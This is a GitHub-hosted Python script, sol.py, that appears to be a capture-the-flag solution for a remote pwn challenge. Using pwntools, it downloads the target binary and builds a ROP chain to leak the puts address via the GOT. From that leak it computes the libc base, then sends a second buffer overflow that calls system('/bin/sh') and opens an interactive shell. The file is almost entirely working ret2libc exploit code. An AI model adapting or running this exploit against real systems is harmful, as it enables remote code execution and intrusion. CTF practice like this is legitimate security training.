-
Notifications
You must be signed in to change notification settings - Fork 1
/
Copy pathsol.py
49 lines (35 loc) · 1.15 KB
/
sol.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
from pwn import *
import base64
from os import path
p = remote('challs.xmas.htsp.ro', 12002)
print p.recvuntil('b\'')
binary = p.recvuntil('\'')
with open('binary', 'wb') as file:
file.write(base64.b64decode(binary))
libc = ELF('libc-2.27.so')
e = ELF('binary')
rop = ROP(e)
POP_RDI_RET = rop.find_gadget(['pop rdi', 'ret'])[0]
RET = rop.find_gadget(['ret'])[0]
while True:
if path.exists('vars'):
break
sleep(0.5)
with open('vars', 'r') as file:
data = file.read().split(';')
size = int(data[0])
main = int(data[1], 16)
# p = process('binary')
p.sendlineafter('? ', 'A' * size + p64(0x0) + p64(POP_RDI_RET) + p64(e.got['puts']) + p64(e.plt['puts']) + p64(main))
print p.recvline()
print p.recvline()
puts = u64(p.recvline()[:-1] + '\x00\x00')
log.info('puts: {}'.format(hex(puts)))
libc_base = puts - libc.symbols['puts']
log.info('libc_base: {}'.format(hex(libc_base)))
system = libc_base + libc.symbols['system']
log.info('system: {}'.format(hex(system)))
sh = libc_base + next(libc.search('/bin/sh'))
log.info('/bin/sh: {}'.format(hex(sh)))
p.sendlineafter('? ', 'A' * size + p64(0x0) + p64(RET) + p64(POP_RDI_RET) + p64(sh) + p64(system))
p.interactive()